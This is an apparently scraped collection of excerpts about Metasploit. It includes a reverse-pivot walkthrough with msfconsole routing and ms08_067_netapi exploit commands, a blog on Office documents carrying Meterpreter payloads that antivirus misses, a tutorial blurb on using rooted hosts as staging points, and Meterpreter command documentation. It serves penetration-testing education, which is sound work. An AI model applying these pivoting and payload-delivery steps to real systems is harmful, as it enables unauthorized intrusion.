background preloader

Easy 1

Facebook Twitter

Markremark: Reverse Pivots with Metasploit - How NOT to make the lightbulb. In a penetration test your target is PII kept on a corporate file server which I will call Victim2. You are outside the firewall but have gained access to an internal host, Victim1, when a user opened your word document with an embeeded Meterpreter payload. The stager embedded in the word document made a REVERSE_TCP connection to your machine which uploaded metsrv.dll to the victim. The machine you have access to (Victim1) has unfiltered access to your target (Victim2). Victim2 is vulnerable to ms08_067_netapi. Victim2 however, has NO access to the internet at all. Your IP = 192.168.1.1 Victim1 = 10.4.4.4 Victim2 = 10.5.5.5 Background session 1? Msf exploit(ms08_067_netapi) > route add 10.5.5.5 255.255.255.255 1 msf exploit(ms08_067_netapi) > route print Active Routing Table Subnet Netmask Gateway 10.5.5.5 255.255.255.255 Session 1 msf exploit(ms08_067_netapi) > sessions -l Active sessions Id Description Tunnel 1 Meterpreter 192.168.1.1:80 -> 10.4.4.4:1034 msf exploit(ms08_067_netapi) > exploit .

WmapNikto - msf-hack - One-sentence summary of this page. - Project Hosting on Google Code. Markremark: Metasploit Visual Basic Payloads in action. John Strand turned me on to this at CDI in December. We were talking about my presentation on the effectiveness of antivirus in detecting metasploit payloads and he asked if I had done any testing on the visual basic payloads. At the time I had not, but now I have to agree with John's assersion that this is potentially a very scary and powerful feature. Metasploit payloads can easily be embedded in Microsoft Office Documents and, as you might expect if you've read my previous blogs, antivirus software does not detect the payloads. I made a video to demonstrate the creation and use of the payloads. To mitigate these attacks you can use Group policy to set your Office Document Macro Security to HIGH. You could use the Medium setting if you work for that mythical company where users don't ignore security warnings.

Setting Macro LevelsOffice Group Policy Templates. Metasploit Mailing List. Archives. OpenSSH-Script for meterpreter available ! 561. Deploying Metasploit as a Payload on a Rooted Box Tutorial. Description: While hacking, it's all about staying anonymous and untraceable. Most good hackers would thus chain proxies or root a series of boxes and use them as staging points for further attacks. As one can imagine, once a remote box is 0wned, it is important to get the right tools on it, in order to use it for attacking other systems. Now what tool could be better for rooting systems than metasploit? :) In this video, xsploitedsecurity shows us how to deploy the entire metasploit framework as a payload and execute it on the remote machine which can then be used to further launch exploits remotely. This is a recommended watch! Very nice demo! Tags: basics , Disclaimer: We are a infosec video aggregator and this video is linked from an external website.

Comments: Metasploit/MeterpreterClient - Wikibooks, collection of open-content textbooks. TODO - meterpreter introduction. Core Commands[edit] ? [edit] We can use ? Or help to show a list of commands with brief descriptions. background[edit] Using the background command places the current session into the background and brings us back to the Metasploit console without terminating the session. Meterpreter > background msf exploit(handler) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.50.112:443 -> 192.168.50.100:1495 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > channel[edit] TODO Displays information about active channels close[edit] TODO Closes a channel exit[edit] Returns to the Meterpreter console and closes the active session. meterpreter > exit [*] Meterpreter session 1 closed. msf exploit(handler) > sessions -l Active sessions =============== No active sessions. help[edit] interact[edit] TODO Interacts with a channel irb[edit] migrate[edit] quit[edit] read[edit] run[edit] use[edit]

SecTor 2010 - HD Moore - Beyond Exploits. XLSinjector Milo2012's Security Blog. Armitage - Cyber Attack Management for Metasploit. Nsploit.